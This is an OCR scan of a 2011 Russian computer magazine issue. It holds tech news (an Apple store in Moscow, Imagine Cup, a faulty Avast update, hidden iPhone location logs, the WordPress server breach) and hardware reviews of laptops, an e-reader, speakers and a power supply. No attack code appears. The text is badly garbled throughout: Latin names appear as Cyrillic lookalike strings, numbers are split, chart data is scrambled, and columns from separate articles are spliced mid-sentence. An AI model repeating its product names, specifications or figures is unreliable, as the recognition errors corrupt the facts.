произойти. ІІоАррІеБіоге.сот сообщает, что в 
марте столицу России посетили топ-менеджеры 
Арріе Рон Джонсон и Боб Бриджер. Эти двое 
приехали вовсе недлятого, чтобы поглазеть 
на Красную площадь: они выбирали место для 
первого Арріе Зіоге на постсоветском про- 
странстве. Судя по всему, первый яблочный 
магазин откроетсвои двери в здании гостиницы 
«Москва» — той самой, что рядом с Кремлем 
и Манежной площадью. Для тех, кто не знает: 



гостиница с 2002 года закрыта на реконструкцию, 
завершение работ запланировано на конец 
201 1 — начало 2012 года. Менеджеры Арріе, по- 
хоже, присмотрели там двухэтажное помещение 
площадью около 1 500 м2. По информации все 
того же іІоАррІеЭіоге.сот . договор аренды 
пока не подписан, но решение будет принято в 
ближайшее время. Неужели не будет больше 
перекупщиков и новинокот Арріе по цене в пять 
раз превышающей реальную (в первыедни 
продаж іРаб 2 в Москве он стоил около 1 20 000 
ру бл е й ] ? Фа нта сти ка . 




► 012 
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РОССИЙСКИМ ФИНАЛ ІМА6ШЕ С11Р 



16 апреля в Культурном центре Государственного университета Высшая 
школа экономики (НИУ ВШЭ] состоялся российский финал ежегодно- 
го кубка технологий Місгозоб: Ітадіпе Сир 201 1 . В этом году в Ітадіпе 
Сир зарегистрировались и приняли участие более 8 000 человек, но до 
финала добрались лишь двенадцать команд. Восемь команд в категории 
«программные проекты» и четыре команды в категории «встраиваемые 
системы». Помимо выступлений команд, на мероприятии проходили раз- 
личные конкурсы, работали демонстрационный стенд ѴѴіпсІоѵѵз Рбопе 7 
иуникальный передвижной планетарий ѴѴогІсІѵѵісІе Теіезсоре из МГУ. Что- 
бы посмотреть на финал, послушать именитых гостей и просто пообщать- 
ся стакими же увлеченными людьми, собралось более трехсотзрителей 
из различных вузов. Еще несколько сот человек смотрели прямую транс- 
ляцию в Сети. В этом году российский финал судило жюри, состоявшее 
из представителей организаторов конкурса, университетов, спонсоров 
мероприятия и журналистов (в «судейский корпус» входил и главный 
редактор Хакера). Жюри выбрало две команды, которые представят 
Россию в финале соревнований, который состоится в июле этого года в 
Нью-Йорке. Первое место в категории программных проектов заняла 
команда ОгТеат из Московского авиационного института с проектом 
ОгісгаГСег. Эта система направлена на преодоление пристрастия детей к 
компьютерным играм и приобщения их креальномутворчествус помо- 
щью искусства оригами. Первое место в категории встраиваемых систем 




отошло команде Саіѵиз из Саратовского государственного технического 
университета с проектом автоматизированного комплекса по выращива- 
нию и разведению личиночной формы аксолотля — особи, используемой 
при исследовании стволовых клеток. От всей души поздравляем ребятс 
победой и желаем им удач и в Нью-Йорке! 



Порядка 4% из 130 000 000 пользователей антивируса Аѵа$( пострадали 
из-за выпуска компанией дефектного файла с новыми сигнатурами 
(110411-1). После обновления антивирус бросался блокировать все что мог, 
включая сайт Аѵазі и их техподдержку. Оплошность исправили быстро - в 
течение часа. Компания уже принесла свои извинения. 

ТВОЙ ІРНОИЕ СЛЕДИТ ЗА ТОБОЙ. И АНОКОЮ ТОЖЕ. 

Все чаще и чаще в современной жизни можно найти повод для при- 
ведения цитаты из Оруелла: «Большой брат следит за тобой». На 
этот раз группа независимых энтузиастов выяснила, что устрой- 
ства компании Ар р Іе (іРЬопе и і Ра сі ] фиксируют и бережно хранят 
координаты местоположения себя любимых. Месторасположение, 
судя по всему, определяется методом триангуляции по сигналу от 
сотовых вышек и точкам ѴѴі-Рі. Началось это, по мнению упомянутых 
энтузиастов, с выходом і 05 4. Собранные устройством данные за- 
писываются в скрытый файл сопзоІісЫесІ.сІЬ, который сохраняется 
на компьютер владельца при каждой синхронизации телефона или 
планшета с іТипез. Уже подтверждено, что собранная инфа (коорди- 
наты устройства и дата-время] не передается на удаленные сервера 
Ар р Іе или каких-либо других компаний, та к что Стив Джобс, дорогой 
читатель, за тобой не шпионит. Однако приятного в этой слежке все 
равно мало. Почему? Да потому что с помощью простенькой про- 
граммы іРЬопе Тгаскег [ реіеул/агбеп.діІбиЬ.со т] можно просмотреть 
данные о передвижении яблочного гаджета, вытащив их из бэкапа, 
который создается при каждой синхронизации девайса с ІТипез. А 
ведь можно выудить эту информацию не только из своего аппара- 
та, но и из чужого... Представляешь, к примеру, муж может взять и 
посмотреть все перемещения своей половинки за последний год. 

А если наоборот? В качестве «лекарства» парни, обнаружившие 
брешь, предлагают разве что зайти через ІТипез в настройки аппа- 
рата и поставить галочку напротив «Епсгурі іРЬопе Васкир». Кстати, 



после распространения этой новости по Сети разработчик Магнус 
Эрикксон поковырялся в АпбгоісІ-устройствах и обнаружил почти 
то же самое. Файлы сасНе.сеІТ и сасбе.ѵѵііч, хранящиеся по адресу 
/сіаіа/сіаіа/сот.доодіе.апсігоісі.іосаііоп/ніез, ну очень похожи на 
вышеупомянутый сопзоІісІаіесІ.сІЬ. Но у Ап Ого і б максимальное коли- 
чество хранимых данных хотя бы ограничено 50 записями для сот и 
200 записями для ѴѴіЕі -точек. Есть также ограничение по времени: 

1 2 часов для сот и 48 часов для ѴѴІЕІ. 
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► Оіз 



МЕ6АЫЕШ5 



ЧЕРНАЯ ПОЛОСА ѴѴОРйРКЕЗЗ 




Одна из наиболее популярных в мире площа- 
док для блогов — ѴѴогсІргезз — в последнее 
время переживает не лучшие времена. Нет, 



количество пользователей ѴѴогсІргезз по- 
прежнему огромно и популярность велика, но 
в прошлом месяце ѴѴогсІргезз .сот пережил 
мощнейшую в своей истории ООоЗ-атаку, от 
которой пострадало почти 1 8 000 000 блогов, 
в том числе и со статусом ѴІР. Представители 
компании тогда заявляли, что мощность атаки 
составила «несколько гигабит или десятки 
миллионов пакетов в секунду», причем атака 
затронула серверы проекта, расположенные в 
трех различных датацентрах. А в этом месяце 
ѴѴогсІргезз вообще взломали. Хак вышел 
просто отличный: неизвестные взломщики 
получили гооі-доступ к ряду серверов компа- 
нии Аиіотаиіс, владеющей блог-хостингом 
ѴѴогсІРгезз.сопп . В руки киберпреступников по- 



пала прорва данных, включая исходники VI Р- 
сайтов, внутренние документы и публикации, 
пароли и авторизационные ключи от различ- 
ных служб и аккаунтов, которые используются 
для интеграции сайтов с социальными сетями 
(такими как РасеЬоок или Тѵѵіиег), облачными 
сервисами хранения и обработки данных (на- 
пример, Атагоп 53]. Не исключено, что «уплы- 
ли» и приватные ключи 55І_-сертификатов. 
Каким образом злоумышленники сумели 
проникнуть на сервера компании АиІотаШс, 
да еще и получитьтам гооі-привилегии, 
компания не сообщает, прикрываясьтем, что 
сейчас ведется расследование. 



ЦВЕТНАЯ «КНИЖКА» ОТ ѴѴЕХІ.ЕР 



ШЕН1СП 



Компания ѴѴЕХІ_ЕВ, чьи устройства для чтения весьма популярны на российском рынке, не забывает 
и о тех, кого не привлекают плюсы технологии «электронных чернил». Компактный девайс, полу- 
чивший название ѴѴЕХЕЕП.ВООКТ5002, разработан на базе 5-дюймовой сенсорной ТЕТ-матрицы с 
ЕЕО-подсветкой. Какты понимаешь, дисплей данного ридера - цветной, и с него с легкостью можно 
читать в тем ноте или при плохом освещении. И, кстати, с ѴѴЕХЕЕР.ВООКТ5002 можно нетолько 
читать (поддерживаются форматы А5СІІ, ТХТ, ВОС.РОВ.НТМЕ.РОЕ, ЕВ2], но и смотреть видео (ѴѴМѴ, 
РМ, АѴІ, РМѴВ.ЗВР, ЕЕѴ, МР4, ОАТ, ѴОВ, МРО, МРЕВ, МКѴ, МОѴ), изображения рРЕВ, ВМР, 6ІЕ), 
слушать музыку (МРЗ.ѴѴМА, АРЕ, ПАС, ААС], радио или аудиокниги через встроенный динамик 
или через наушники. Однако, как известно, за подсветку и цветобычно приходится расплачиваться 
непродолжительным временем работы устройства... В этом смыслеуѴѴЕХЕЕР все в полном порядке: 
ТЕТ-матрица ѴѴЕХЕЕР.ВООКТ5002 имееточень низкое энергопотребление. При чтении полного 
заряда аккумулятора хватает более чем на 7 часов, при просмотре видео -более чем на 4 часа, при 
прослушивании аудио-файлов (при выключенном экране] - более чем на 25 часов. Управляется 
устройство при помощи сенсорного экрана - легким прикосновением руки или стилуса, который идет 
в комплекте. Для быстрого перехода между страницами на передней панели «книжки» размещены 
специально вынесенные кнопки. ѴѴЕХЕЕР.ВООКТ5СЮ2также оснащается датчиком пространствен- 
ного положения 6-сенсор, который позволяет одним движением руки менять положение станицы на 
экране от вертикального к горизонтальному и обратно. Одной из наиболее интересныххарактеристик 
новинки является также и ее цена - она составит всего 3499 руб. ѴѴЕХЕЕР.ВООКТ5002уже поступил в 
продажу, так что можешь начинать искать его на прилавках магазинов своего города. 




ШКОЛА АВТОРСКИХ ПРАВ ОТ Ѵ0ТОЕ 




УоиТиЬе уже давно известен как рассадник по- 
вальной копирастии, где малейшее нарушение 
правил чаще всего приводит к ба ну аккаунта. 
Точнее — приводило. УоиТиЬе решил пересмо- 
треть свою политику и донести до юзеров, что же 
именно они делают не та к. 

Отныне, если какой-то твой роликуличатв 
нарушении чьих-либоавторскихправ,тебя не 
забанят, а отправят... смотреть мультики. Это не 
шутка, проштрафившиеся юзеры отправляются 



в «Школу авторских правУоиТибе» (СоругідЫ: 
зЬсооІ], где им будет предложено посмотреть 
обучающий мульт из серии Нарруігееітіепсіз 
(!], а затем пройти простенькоетестирование, 
доказывая, что содержание ролика не прошло 
мимо мозга. После этого аккаунт будет разблоки- 
рован. Поржать и насладиться этим торжеством 
маразма можно прямо вот здесь: ѵоиІиЬе.сот/ 
сорѵгідЫ зсЬооІ . Субтитры на всех языках мира 
в комплекте. 



» Борьба с ЗМЗ-мошенниками больно ударила по карманам операторов 
связи. После введения новых правил доходы сотовых операторов от 
направления контент-услуг снизились на 15-30%. 



► 014 
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АКУСТИКА ОА 5000 РКО В РОССИИ 

Долго, оченьдолго добиралась в «наши Палестины» акустическая 5.1 
система БА5000 Рго от известной компании ЕсІіТіег. На рынки Украины, 

Греции, Дании и других стран БА5000 Рго поступила еще парулеттому на- 
зад и завоевала там огромную популярность. Секретуспеха данной модели 
заключается в следующем: во-первых, это более продвинутая версия 
базовой БА5000 (теперь сателлиты сделали деревянными и двухполосны- 
ми], тоже имевшей большой успех, во-вторых, в новых сателлитах РА 5000 
Рго легко опознать почти полную копию сателлитов другой популярной 
модели - СЗ. Их корпуса по-прежнему выполнены из листов МРРтолщиной 
9 мм, но если в случае СЗ использовалась отделка под натуральное дерево, 
то в комплекте РА 5000 Рго она заменена обычной черной пленкой ПВХ. 

Благодаря этому система выглядит более благородно и уверен но. Добавим 
кперечисленному массивный деревянный сабвуфер, БЕР-дисплей с 
индикацией состояния регулировок, полноценный ДУ нового образца с 
большим набором настроек и предустановок, и ЕБАЗН-памятьдля сохра- 
нения/запоминания настроекуправления. Технические характеристики 
новинки таковы: выходная мощность фронтальных сателлитов — Вт(РМ5] 

2x1 2, выходная мощностьтыловых сателлитов — Вт (РМ5) 2x12, выходная 
мощность центрального канала — Вт (РМ5) 1 2, выходная мощность сабву- 

Рогіипе сообщает, что руководство ТѵѵіНег отклонило сразу несколько 
крупных предложений о покупке. РасеЬоок якобы предлагал за ТѵѵіНег 
$2 000 000 000 долларов, а боодіе - целых $10 000 000 000. Последняя 
цифра превышает стоимость компании почти вдвое. 

МАССИРОВАННЫЙ УДАР ПО ПОКЕРУ 

Для любителей азартных игр, похоже, 
наступила черная полоса. Малотого, что 
не дают поиграть в реале, так теперь до- 
брались и до сетевых казино. Крупнейшие 
залы онлайн-покера (Рокегзіагз, Ей Ц Ті 11; 

Рокег и АЬзоІиІе Рокег] внезапно при- 
крыли. Какоказалось, на Западе было 
начато уголовное расследование против 
руководства этих компаний. Выдвинутые 
обвинения впечатляют: тут и банковское 
мошенничество, и отмывание денег, и 
организация незаконных азартных игр, 
и многое другое. Всего по делу проходят 
одиннадцать человек, трое из которых уже 
были арестованы, а затем отпущены под 
залог (остальные находятся внетерри- 
тории США]. Сайты РокегЗіагз и Ей II Ті 11; 

Рокег обещают в скором времени разбло- 
кировать, но лишьдлятого, чтобы игроки 
смогли вернуть свои деньги, заморожен- 
ные одновременно со счетами подслед- 
ственных компаний. Контролировать про- 
цесс возврата средств будет независимый 
наблюдатель, которого выберут позднее. 

Третьему сайту — Абзоіиіе Рокег — также 
была предложена возможность временной 
разблокировки домена, но руководство 
этого покер-рума пока не выразило осо- 
бенного восторга по этому поводу. 






фера — Вт (РМ5] 60. Частотный диапазон сателлитов составляет 1 60-20000 
Гц, частотный диапазон сабвуфера — 20-160 Гц. Входное сопротивление — 
20 кОм .Уровень входного сигнала: 450 мВ. Рекомендованная цена БА 5000 
Рго составляет $235. 
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РЕВКІІМ 



НОУТБУК ДЛЯ РАБОТЫ 

Выбираем ноут с диагональю до 14" 

о Ассортимент моделей, представленных сегодня на рынке мобильных 
компьютеров, растет по экспоненте, и проблема выбора становится все 
сложнее. Но вне зависимости от того, требуется ли тебе стильный 
аксессуар или простая рабочая лошадка, основные критерии выбора 
остаются неизменными: производительность, время автономной 
работы, габариты, качество дисплея. Их мы и будем оценивать. 



Методика тестирования 

Для тестирования ноутбуков, приехавших к нам в лабораторию, мы 
применили специально подобранный набортестов, из которого были ис- 
ключены игровые приложения, так как диагональ экранов подопытных 
сегодня составляла не более 14дюймов — особо не поиграешь. Поэтому 
для проверки быстродействия графических подсистем был использован 
классический бенчмаркЗОМагк’Об. Крометого, мы применилитестовый 
пакет РСМагк Ѵапіаде для оценки общей производительности системы, 
встроенные в архиваторы 7-2ір и ѴѴі п РАР бенчмарки для оценки работы 
связки процессор-память, а также провели тестБирегРІ, в процессе ко- 
торого ноутбуки занимались крайне интересным делом — высчитывали 
число Пи с точностью до миллиона знаков после запятой. Длительность 
автономной работы мы проверили с помощьютеста ВаМегу Еаіег Рго, 
запущенного со следующими параметрами: сбалансированный режим 
энергопитания, включенный ѴѴі- Рі и яркостьэкрана 40%. Качество дис- 
плеев устройств было проверено колориметром: графики результатов 
наглядно дают понять, кто чего стоит. 



Технологии 

Весьма интересной тенденцией можно назвать широкое применение 
производителями гибридных видеоподсистем, состоящих из дискрет- 
ных встроенных видеоплат. Первая отвечает за работу с игровыми и 
прочими приложениями, требующими мощных графических вычис- 
лений, а вторая работает в обычных условиях — например, при дейс- 
твиях в интернете и с офисными приложениями. Что нам дает такое 
разделение труда? Во-первых — пониженное энергопотребление, 
во-вторых — меньшее тепловыделение, а следовательно и меньший 
шум от работы системы охлаждения. В-третьих, такое оптимизирован- 
ное разделение труда позволяет увеличить время работы ноутбука от 
аккумулятора. Так что выгоды очевидны. 

В погоне за легкостью и изяществом корпуса можно забыть о том, за 
счетчегоони обычно достигаются. А это весьма важные параметры — 
например, отсутствие оптического привода, только встроенная графи- 
ка и применение процессора с пониженным энергопотреблением, что 
ведет к весьма печальным результатам в плане производительности. 



► 016 
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Асег Азріге ТітеІ. А51І5 

іпеХ 3820Т 1143.1с 



Технические характеристики: 

Дисплей: 13.3 м 

Процессор: ІпіеІСоге І5-430М, 2266 МГц 
ОЗУ: 4 Гб БОРЗ-1 066 

Видеоадаптер: АТІ МоЬіІіТу Расіеоп Н 0 5650, 1024Мб, ІпіеІСМАНО 

Жесткий диск: 300 Гб 
Габариты: 324x235x22 мм 
Вес: 1.8 кг 



Технические характеристики: 

Дисплей: 14" 

Процессор: I пГеІ Соге І7-620М, 2666 МГц 
ОЗУ: 4 Гб ББРЗ-1 066 

Видеоадаптер: ІМѴЮІАбеРогсеЗЮМ, 1024 Мб, ІпіеІСМА НО 

Жесткий диск: 500 Гб 
Габариты: 344x241x32 мм 
Вес: 2.18 кг 



□ 



□ 



+ 

Ноутбуки компании Асегхорошо известны пользователям своим привле- 
кательным дизайном, удачно подобранными компонентами и невысокой 
ценой. Вот и модельАсегА5рігеТітеІ_іпеХ3820Т не стала исключением. 
В оченьтонком и стильном корпусе этого ноутбука скрывается процессор 
I пііеі Соге І5, атакже целыхдва графических адаптера —дискретный и 
встроенный, так что проблем с производительностью в играх у тебя прак- 
тически не будет. Это доказал и результат теста ЗОМагк’Об, в котором 
Асег Азріге ТітеБіпеХ стал лидером. В другихтестах этот ноутбук показал 
себя крепким середняком. На долговечности работы от батареи, кстати, 
решениес двум я в и деоа да пте ра м и та кже с кажется тол ько положи- 
тельно. Любителей симметрии порадует, что верхняя и нижняя крышки 
имеют практически одинаковую толщину. 

Правда, элегантная изящность корпуса во многом была достигнута за 
счеттого, что внутри нетоптического привода. Конечно, можно приоб- 
рести внешний и так далее, но для многих отсутствие этого компонента 
может стать весьма неприятным сюрпризом. 



+ 

Мода на ноутбуки, выполненные в стиле «под карбон», видимо, прошла — 
теперьхорошим тоном считается продемонстрировать свою «зеленость» 
и приверженность идее защиты окружающей среды. Наверное поэтому 
ноутбук А51І5 11433с отделан коричневым бамбуком. Нужно сказать, что 
получилось весьма симпатично. Внутри скрыты мощные компоненты: 
процессор Іпіеі Соге І7 и две видеоплаты — встроенная и дискретная 
ІЧѴІБІА.такчто во всех тестах А51І5 11433с стабильно был в тройке лиде- 
ров. Система двойного видео позволяетснизить нагрев и продлить время 
работы от аккумулятора. Из других компонентов стоит отметить наличие 
оптического привода и жесткого диска объемом в 0.5 Тб. Встроенная 
веб-камера снабжена специальным тумблером-выключателем, который 
не дасттебе случайно начать нежелательнуютрансляцию. Крометого, эта 
модель показала хорошее время работы от батареи — 2.5 часа. 

В процессе тестирования устройства были замечены неполадки стач- 
падом — вместо простого передвижения курсора происходило выде- 
лениетекста или области на экране. Был ли это брак или особенность, 
установить не удалось. 
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ОеІІ 

Ѵозіто 3300 

Технические характеристики: 

Дисплей: 13.3 м 

Процессор: I піеі Соге І7-640М, 2800 МГц 
ОЗУ: 4 Гб 00РЗ-1 066 

Видеоадаптер: ІЧѴЮІАЭеРогсе 31 ОМ (1024 Мб), ІпіеІбМА НО 

Жесткий диск: 500 Гб 
Габариты: 325x229x29 мм 
Вес: 1 .81 кг 

■■■■■■■■■□ 



НР Раѵіііоп 

СІГП4-1100 

Технические характеристики: 

Дисплей: 14 м 

Процессор: I пііеі Соге І5-520М, 2400 МГц 
ОЗУ: 4 Гб ООРЗ-1 066 

Видеоадаптер: АТІ МоЬіІііу Вабеоп НО 5470, 512 Мб, ІпіеІСМАНО 

Жесткий диск: 500 Гб 
Габариты: 341x228x32 мм 

Вес: 2 кг 

■■■■■■■■■□ 



+ 

Перефразируя известную крылатую фразу, можно сказать, что «в креп- 
ком корпусе ноутбука — крепкие компоненты», в смысле — хорошие. 
Это как раз про ОеІІ Ѵобіхо 3300. При первом же взгляде на него стано- 
вится ясно, что это надежное устройство, которое не подведет своего 
владельца. Подняв крышку, мы видим, что все выдержано в том же 
строгом, «крепком» стиле — и клавиатура, и дополнительные клавиши 
управления, и тачпад. Начинка столь же крепка: мощный процессор 
I піеі Соге і 7, 4 Гб оперативной памяти, гибридная видеоподсистема 
и 0.5 Тб жесткий диск. Все вместе они обеспечили ноутбуку хорошие 
результаты в тестах, а тебе дадут возможность как работать, так и полу- 
чать удовольствие от игр. 




Несмотря на то, что батарея серьезно выдается за пределы корпуса, 
результат теста на автономную работу не слишком впечатляет. Система 
охлаждения довольно сильно шумит, но но это не результат эффектив- 
ной работы — нагрев существенен. Корпус лишен изящества, но плюс 
это или минус — каждый решит для себя сам. 



+ 

Открыв крышку, мы увидели, что внутреннее пространство устройства от 
НРтакже симпатично и немного необычно, каки его внешняя сторона 
— правда, уже благодаря отделке алюминием. Но разработка дизайна 
не отвлекла создателей от начинки: внутри ты найдешь становящуюся 
популярной систему из двух графических адаптеров (позволившую этому 
ноутбуку стать серебряным призером теста на длительность автономной 
работы] и процессор I пііеі Соге І5 (который вкупе с остальными компонен- 
тами обеспечил уверенные средние результаты в испытаниях на произ- 
водительность]. Дисплей с диагональю 14 дюймов порадовал качеством 
картинки и яркостью, но колориметрический тест продемонстрировал 
отклонения от идеала. Веситустройство немало, зато внутри есть и опти- 
ческий привод, и жесткий диск емкостью 500 Гб. 

Любители отдельных дополнительных мультимедийных клавиш ихтут 
не найдут, эти функции закреплены за рядом кнопок Р 1 - Р 1 2 и акти- 
вируются при нажатии клавиши Рп — придется привыкать и немного 
переучиваться. 
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5ат$ипд 

5Р410-501 

Технические характеристики: 

Дисплей: 14" 

Процессор: ІпіеІСоге І5-460М, 2530 МГц 
ОЗУ: 4 Гб О ОРЗ- 1333 

Видеоадаптер: ІМѴЮІАВеРогсеЗІОМ, 512 Мб, ІпіеІВМАНО 

Жесткий диск: 500 Гб 
Габариты: 347x246x32 мм 
Вес: 2. 17 кг 



Бопу 

ѴРС-УА1Ѵ9Р/В 

Технические характеристики: 

Дисплей: 1 1 . 6 " 

Процессор: ІпіеІСоге ІЗ-380ЦІ М , 1333 МГц 
ОЗУ: 4 Гб О ОРЗ- 1333 

Видеоадаптер: ІпіеІВМАНО 
Жесткий диск: 500 Гб 
Габариты: 290x202x25 мм 
Вес: 1 .5 кг 



□ 



+ 

Дизайнеры компании Ватзипд всегда уделяли много внимания внешне- 
му виду своихустройств. Данный ноутбуктакже отлично выглядит и вы- 
деляется на фоне других моделей. Не отстают от дизайнеров и инженеры 
— часть разъемов закрыта резиновой крышечкой, предохраняющей от 
попадания пыли (во избежание потери каждая крышечка прикреплена к 
корпусу]. 

Ватзипд 5Р410-501 не отстает от времени и имеет гибридную графи- 
ческую систему — это, скорее всего, стало одним из факторов, которые 
привели его к победе в тесте на длительность работы от батареи. С таким 
спутником ты не заскучаешь в долгой дороге! 

Производительность устройства находится на весьма среднем уровне. 
В поднятом состоянии верхняя крышка перекрывает отверстия для 
отвода горячего воздуха, вследствие чего и сама крышка, и часть кла- 
виатуры существенно нагреваются в процессе работы. 



+ 

Ноутбук 5опу оказался самым компактным в нашемтесте, диагональего 
дисплея немногим меньше 12”, а вес всего 1 .5 кг. Естественно, что при 
таких габаритах в нем установлен процессор с пониженным энергопот- 
реблением — I піеі Соге ІЗ-3801ІМ, а вот наличие 1 .5 Тб жесткого диска 
является приятным сюрпризом. Время автономной работы составило 
более двух часов, та к что заскучать тебе с ним вряд ли ус пеется. Также 
нам понравиласьэргономика ноутбука и его функциональность — все на 
своих местах, ничего лишнего. 

На сегодня компактные устройства обязательно имеют недостатки, выте- 
кающие из их небольших размеров. В данном ноутбуке они классические 
— отсутствие оптического привода, встроенная видеоплата и невысокие 
результаты в тестах на производительность. 
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РЕВВІІЛЛ 



Результаты 

Тестов 



оРСМагк Ѵапіаде, баллы 

5опу ѴРС-ѴА1 Ѵ9Р/В 
Затзипд 5Р410-501 
НР Раѵіііоп гіт4-1 1 00 
йеіі Ѵозіго 3300 
А51І5 1143.1 

Асег Азріге ТітеЫпеХ 3820Т 



оЗОМагкОб, баллы 

Зону ѴРС-ѴА1 Ѵ9К/В 
Затзипд ЗР41 0-501 
НР Раѵіііоп бт4-1 100 
йеИ Ѵо8(го 3300 
АЗІІЗ 1)433 

Асег Азріге ТітеЫпеХ 3820Т 




О 1000 2000 3000 4000 5000 6000 7000 



0 1000 2000 3000 4000 5000 4000 7000 0000 



Ноутбук Бопу оказался аутсайдером в этом тесте 



Лидеры обозначились четко 



оѴѴіпШ, Кб/с 

Зопу ѴРС-ѴА1 Ѵ9Р/В 
Затзипд 8Р410-501 
НР Раѵіііоп бт4-1 100 
ОеІІѴозІгоЗЗОО 
АЗІІЗ 1143.1 

Асег Азріге ТітеЫпеХ 3820Т 



Небольшая разница есть, она зависит от скорости 
процессора 



о7-2ір, баллы 

5опуѴРС-ѴА1Ѵ9К/В 
Затзипд 5Р410-501 
НР Раѵіііоп бт4-1 100 
ОеІІѴозІгоЗЗОО 
АЗІІЗ 11431 

Асег Азріге ТітеЫпеХ 3820Т 



0 200 400 400 000 1000 1200 1400 1600 1000 2000 



0 1000 2000 3000 4000 5000 4000 7000 8000 



Процессору ноутбука Бопу не хватает мегагерцев 



оЗирег Рі, с 

Зопу ѴРС-ѴА1 Ѵ9К/В 
Затзипд 5Р410-501 
НР Раѵіііоп бт4-1 100 
ОеІІѴозІгоЗЗОО 
АЗІІЗ 1^ 

Асег Азріге ТітеЫіпеХ 3820Т 

Чем меньше, тем лучше 




оВремя работы, мин 

Зопу ѴРС-УА1 Ѵ9Р/В 
Затзипд ЗР410-301 
НР Раѵіііоп бт4-1 100 
ОеІІѴозІго 3308 
АЗІІЗ 11431 

Асег Азріге ТітеЫпеХ 3820Т 




0 5 10 15 20 25 30 35 40 



0 20 40 60 00 100 120 140 160 100 200 



Ноутбук Батзипд лидер по длительности автономной работы 



Выводы 



Болыыие и маленькие, быстрые и не очень, вызываюыде элегантные и 
классически строгие — в наі-ыем сегодняі_ынем тесте были ноутбуки на 



любой вкус. Титул «Выбор редакции» получил Затзипд 5 Р41 0-501 за 
высокую скорость и долгое время автономной работы, а победителем 
в номинации «Лучі_ыая покупка» стал Асег Азріге ТітеЫпеХ 3820Т, 
недорогой и удобный помоыдник во всех задачах, ц-с 
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РЕВВІІЛЛ 



I Алексей Горбунов 



ЗОЛОТАЯ ЖИЛА 

Тестирование блока питания Р5РАЦКІІМ 60Ю 700 (АІІ-700) 





Золотая жила 

Один из важнейших компонентов любой системы — это блок питания. 

И чем мощнее конфигурация, тем более жесткие запросы предъявля- 
ются к БП. Если речь идетоб игровом ПК, то источнику питания при- 
ходится работать в тяжелых условиях серьезных нагрузок и высокой 
температуры окружения. При этом он должен выдавать напряжения по 
основным линиям в рамках допустимых отклонений, не перегреваться 
и не пугать окружающих воем своей системы охлаждения. По завере- 
ниям компании Р5Р, ее новая линейка блоков питания под названием 
АІЭПІЭМ (в переводе с латыни — золото] соответствует самым высоким 
стандартам. Мы решили проверить это на примере самого мощного из 
немодульных БП этой серии — АІІНІІМ 60 Ю 700. 

Открываем и осматриваем 

Виновник торжества поставляется вчерной коробке с золотыми 
вставками, где также находятся краткая инструкция по применению, 
кабель питания, мягкие хомуты на липучке для проводов, винты 
для крепления БП и наклейка ело го Р5Р. Внешне АІІ РИМ 6 О Ю 700 
оформлен в том же золотисто-черном стиле — название семейства 
обязывает. Он принадлежит к стандартному (немодульному] типу 
блоков питания: из корпуса выходит ограниченный пучок проводов 
с разъемами для подключения компонентов системы — не приба- 
вить, не отнять. С другой стороны, набора кабелей хватит для пары 
видеокарт с питанием по разъему 6+2 ріп, семи устройств с коннекто- 
ром 5АТА и четырех с Моіех. Этого более чем достаточно для сборки 
игрового компьютера. 

Мощность АІЭ РЭМ 60 Ю 700 составляет 700 Вт, заявленный КПД ра- 
вен 87% (соответствует сертификату 80Р1из ОоШ]. При этом БП обеспе- 
чиваеттокдо 28 А по линиям +3,ЗѴ и +5Ѵ, а также до 18 А по каждой из 
четырехлиний +12Ѵ. Охлаждается блокпитания при помощи 120-мил- 
лиметрового вентилятора на гидродинамическом подшипнике, что 
обещает низкий уровень шума и долгий срок работы самого ветродуя. 

Методика тестирования 

Для тестов Р5Р АІІПУМ 60 Ю 700 мы использовал и специальный 



Мощность: 700 Вт 
Заявленный КПД: 87% 

Количество линий +12Ѵ: 4 

Максимальные токи по линиям: +З.ЗѴ — 28 А, +5Ѵ — 28 А, +12Ѵ1-Ѵ4 
— 18 А, -12Ѵ — 0.5 А, +5ѴзЬ — 3.5 А 

Максимальная комбинированная нагрузка: +З.ЗѴ & +5Ѵ — 1 60 Вт, 

+З.ЗѴ & +5Ѵ & +1 2Ѵ1 ... & +1 2Ѵ4 - 672 Вт 
Тип РРС: активный 
Охлаждение: вентилятор 1 20 мм 
Габариты: 150x140x86 мм 

Вес: 1.9 кг 

Цена: 3700 руб. 

стенд Б-РАМ ОВ5-2200. Это устройство позволяет выставлять силу 
потребляемого тока для каждой из линий испытуемого блока пита- 
ния. Суммарно можно задать до 850 Вт нагрузки на БП. При этом на 
панели индикации отображаются реальные значения напряжений 
по линиям. 

Методика проведения тестов следующая. Выставив для линий +1 2Ѵ 
потребляемую мощность в 1 00 Вт, мы последовательно повышаем 
нагрузку налиниях+З.ЗѴи +5Ѵ с шагом 20 Вт. Для каждого шага сни- 
маем показатели с индикаторов напряжения. Далее потребляемая 
мощность на линиях +1 2Ѵ увеличивается до 200 Вт, и процесс повто- 
ряется заново. Пределы ограничиваются значениями максимальной 
комбинированной нагрузки Р5Р АІЭРОМ 60 Ю 700: по линиям +З.ЗѴ & 
+5Ѵ - 1 60 Вт, по +1 2Ѵ1 ... & +1 2Ѵ4 - 500 Вт. 

В итоге получаем три таблички, в которых показаны процентные от- 
клонения напряжений по каждой из основных линий: +З.ЗѴ, +5Ѵ, +1 2Ѵ. 
Чем ниже разница (меньше процент] между замеренным и эталонным 
значениями напряжения, тем лучше — значит, блок питания эффек- 
тивно распределяет нагрузку и не дает проседаний. Для современно- 
го БП-стандарта АТХ допустимыми считаются отклонения от 1% до 5%. 

Золото или позолота? 

Выдать Р5Р АОРІІМ 0010700 золотую медаль будет не совсем 
честно. Завышенная по сравнению с конкурентами цена, отсутс- 
твие модульной системы подключения кабелей, а также пусть и 
негромкий, но все же присутствующий шум от работы при высокой 
нагрузке немного портятобщее впечатление. Однако великолепные 
результаты тестов доказывают, что этот «золотой слиток» дросселей, 
конденсаторов и кабелей полностью оправдает потраченные на него 
средства, став надежной основной для современного игрового ПК. 

Плюсы и минусы 

+ Высокий КПД и сертификация 80 РШ5 6оШ 
+ Практически идеальные результаты тестов 
Шум на уровне выше среднего 
Немодульное подключение 
Завышенная цена 

Можно сказать, что блок питания продемонстрировал отличные по- 
казатели. Максимальные отклонения не превысили 3%, что с лихвой 
укладывается в требуемые по стандарту рамки. При малой и средней 
нагрузке корпус БП оставался чуть теплым, а шум от вентилятора 
не резал слух. Однако если твоя система будет выжимать из АІЭРІЭМ 
ООЮ 700 все соки, то приготовься услышать, какой будет взывать 
ктебе из недр компьютерного корпуса. Правда, очень вероятно, что 
зов будет перекрываться кулером видеокарты или процессора. □С 
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■ ■ Антон «АпЬ> Жуков 




СИГНАТУРНЫЕДЕЛА 

